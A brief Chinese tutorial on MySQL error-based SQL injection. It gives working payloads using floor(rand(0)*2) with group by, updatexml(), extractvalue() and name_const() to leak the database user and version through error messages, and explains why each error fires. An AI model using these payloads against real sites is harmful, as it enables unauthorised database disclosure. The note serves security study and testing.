SQL注入攻击之报错注入
1.floor(rand(0)*2)
注入语句:
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
报错注入原理:
报错关键点group by floor((rand(0)*2))
1. rand(0)生成一组以0为种子产生一组固定随机数:0.15522...,0.62088...,0.63875...,0.33109...,0.73922...,0.70281...,0.29642...等;
2. rand(0)*2将生成的随机数乘以2: 0.31...,1.24...,1.28...,0.66...,1.48...,1.41...,0.59...等;
3.floor(rand(0)*2) 进行向下取整:0,1,1,0,1,1,0...等;
4.group by (floor(rand(0)*2)) 将查询结果进行分组:(gooup by:当查询到的主键键值不存在时会将下个数据插入到虚拟表中,如果存在则将该项键值对应的的总数+1),
整数数据0,1,1,0,1,1,0...两次在查询到0时虚拟表中都没有键值0,都会将插入下个键值1,到第二次插入数据时则会因为虚拟表中数据已经有主键1了而造成主键冗余问题。
2.updatexml()
注入语句:
select updatexml(1,concat(0x7e,version(),0x7e),0x7e);
报错注入原理:
updatexml函数:updatexml(XML_document,XPath_string,new_value),
0x7e,特殊字符~,利用XPath_string解析错误时回显报错信息。
3.extractvalue()
注入语句:
select extractvalue(1,concat(0x7e,version()));
报错注入原理:
.extractvalue函数:.extractvalue(XML_document,XPath_string),
同updatexml()函数一样,利用XPath_string解析错误时回显报错信息。
4.name_const函数报错
注入语句:
select * from(select name_const(version(),1),name_const(version(),1))a;
报错注入原理:列名重复。
只有version()函数可使用。